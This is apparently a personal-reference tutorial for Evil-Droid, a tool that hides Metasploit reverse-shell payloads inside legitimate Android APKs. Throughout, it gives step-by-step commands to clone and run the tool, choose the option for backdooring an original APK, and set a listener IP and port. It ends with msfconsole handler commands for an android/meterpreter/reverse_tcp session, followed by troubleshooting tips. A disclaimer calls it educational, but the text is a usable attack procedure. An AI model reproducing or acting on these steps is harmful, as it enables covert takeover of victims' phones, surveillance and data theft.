Evil-Droid is a framework that creates, generates and embeds APK payloads to penetrate Android platforms. The author does not hold any responsibility for the bad use of this tool; remember, this is only for educational purposes. (All these posts are for personal reference.)
Evil-Droid has the following dependencies:
1 - metasploit-framework
2 - xterm
3 - Zenity
4 - Aapt
5 - Apktool
6 - Zipalign
Clone from the GitHub repo below:
git clone https://github.com/M4sc3r4n0/Evil-Droid.git
Set the execute permission:
cd Evil-Droid
chmod +x evil-droid
As root, run Evil-Droid:
sudo ./evil-droid
Output of the script above:
Choose “YES” on the following pop-up:
Choose option 3, BACKDOOR APK ORIGINAL (NEW):
Set the targeted IP:
Set the port for the payload to connect to:
Give the payload a name:
Choose the reverse shell option the payload should use:
Select an original APK to embed the payload in:
The payload should be saved in the EvilAPK directory when this message appears:
Select the Multi-handler as the reverse connection:
The listener should start and wait for connections/sessions. When a session is established, you should see the message: Session * opened
You can also use Metasploit to initiate the session with these commands:
msfconsole -q
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.104
set LPORT 4444
run
Troubleshooting:
ERROR:
Failed to align recompiled APK!
Solution:
1 - Make sure Zipalign is installed
or
2 - Remove the .android folder (/root/.android/)
ERROR:
Failed to verify signed artifacts
Solution:
- Download the latest apktool.jar: https://ibotpeaches.github.io/Apktool/install/
- Rename apktool_2.X.X.jar to apktool.jar
- Remove Evil-Droid-master/tools/apktool.jar
- Move the downloaded apktool.jar to Evil-Droid-master/tools/